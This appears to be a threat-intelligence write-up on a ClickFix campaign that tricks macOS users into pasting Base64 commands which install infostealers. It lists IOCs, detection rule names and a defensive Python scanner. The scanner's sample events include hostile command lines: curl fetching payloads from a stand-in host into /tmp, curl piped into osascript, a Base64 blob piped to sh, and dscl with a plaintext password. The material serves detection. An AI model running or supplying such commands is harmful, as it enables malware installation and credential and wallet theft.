ClickFix campaign uses fake macOS utilities lures to deliver infostealers
Microsoft researchers have documented a new "ClickFix" technique targeting macOS users that moves away from traditional malicious downloads. Attackers host fake troubleshooting blogs on platforms such as Medium and Squarespace and trick visitors into copying and pasting a Base64-encoded command directly into the Mac's Terminal. Because the user executes the command manually, the attack bypasses Apple's standard Gatekeeper checks entirely, and the malware installs itself silently.
Microsoft identified three distinct variations of this attack. The "Loader" (or SHub) campaign uses a script to fingerprint the infected machine and hides its presence by masquerading as a routine Google software update. The "Script" campaign is fileless: it operates entirely in memory and leaves no traceable files on disk. Finally, the "Helper" (or AMOS) variant displays a fake system prompt to trick users into typing their Mac password, giving the malware deep, persistent control that is re-established every time the system boots.
Once active, all three malware variants aggressively hunt for sensitive data, quietly stealing passwords, browser history, Keychain databases, and personal documents. Furthermore, the Loader and Helper campaigns specifically target cryptocurrency holders: they delete legitimate wallet applications such as Ledger, Trezor, and Exodus and replace them with trojanized versions designed to silently drain users' funds during their next transaction.
IOCs (48)
File names (8)
- /tmp/helper
- /tmp/update
- /tmp/starter
- ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/GoogleUpdate
- ~/Library/LaunchAgents/com.google.keystone.agent.plist
- /Library/LaunchDaemons/com.finder.helper.plist
- .mainhelper
- .agent
Detections (10)
- MacOS Dscl Authonly With Plaintext Password Argument
- MacOS SHub Stealer C2 Event Beacon
- MacOS External IP Discovery Via Base64 Decoded Ipify
- MacOS Killall Terminal During Active Session
- macOS curl Downloading to /tmp/helper or /tmp/update from Shell Lineage
- macOS curl Output Piped Directly into osascript
- macOS LaunchDaemon com.finder.helper.plist or /tmp-Staged Plist Loaded with launchctl
- macOS Cryptocurrency Wallet .app Bundle Overwrite by Non-Installer Process
- macOS Hidden Mach-O Written to User Home (.mainhelper / .agent Style)
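A defender-side illustration of the pasted-command technique described at the top of the page and of the detection list above, added here as example code (not Microsoft's or the platform's own rules): a small Python scanner that runs several of those rules over constructed process events, decoding Base64 blobs in the command line so that an ipify lookup hidden inside a ClickFix paste is visible to the rules. The event format, the sample values and the c2.example.invalid hostname are assumptions.

```python
import base64
import re

# Constructed sample process events (not real telemetry), one per line as
# parent|process|command_line; the last line is a benign control.
SAMPLE_EVENTS = """\
Terminal|bash|echo Y3VybCAtcyBodHRwczovL2FwaS5pcGlmeS5vcmc= | base64 -d | sh
bash|curl|curl -fsSL -o /tmp/helper http://c2.example.invalid/helper
bash|sh|curl -s http://c2.example.invalid/a.scpt | osascript
bash|dscl|dscl . -authonly alice hunter2
bash|launchctl|launchctl load /Library/LaunchDaemons/com.finder.helper.plist
bash|killall|killall Terminal
Terminal|zsh|ls -la ~/Library/LaunchAgents
"""
SHELLS = {"sh", "bash", "zsh"}
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")

def decoded_blobs(cmdline):
    """Text hidden in base64-looking tokens of a command line."""
    out = []
    for tok in B64_TOKEN.findall(cmdline):
        try:  # skip tokens that are not base64 text, e.g. long file paths
            out.append(base64.b64decode(tok, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out

def detect(parent, proc, cmd):
    """Names of the rules listed above that one process event trips."""
    views = [cmd] + decoded_blobs(cmd)  # also inspect the decoded payload
    hits = []
    if proc == "dscl" and re.search(r"-authonly\s+\S+\s+\S+", cmd):
        hits.append("Dscl Authonly With Plaintext Password Argument")
    if any("ipify" in v for v in views):
        hits.append("External IP Discovery Via Base64 Decoded Ipify")
    if proc == "killall" and "Terminal" in cmd.split():
        hits.append("Killall Terminal During Active Session")
    if proc == "curl" and parent in SHELLS and re.search(r"-o\s+/tmp/(helper|update)\b", cmd):
        hits.append("curl Downloading to /tmp/helper or /tmp/update from Shell Lineage")
    if re.search(r"\bcurl\b[^|]*\|\s*osascript\b", cmd):
        hits.append("curl Output Piped Directly into osascript")
    if proc == "launchctl" and re.search(r"\b(load|bootstrap)\b.*(com\.finder\.helper\.plist|/tmp/\S+\.plist)", cmd):
        hits.append("LaunchDaemon com.finder.helper.plist or /tmp-Staged Plist Loaded with launchctl")
    return hits

def scan(events=SAMPLE_EVENTS):
    """Map each flagged command line to the rules it fired."""
    rows = [line.split("|", 2) for line in events.strip().splitlines()]
    return {cmd: hits for parent, proc, cmd in rows if (hits := detect(parent, proc, cmd))}
```

Only the benign `ls` line escapes every rule; the pasted command is caught by the ipify rule purely because the scanner decoded the blob rather than matching the literal text.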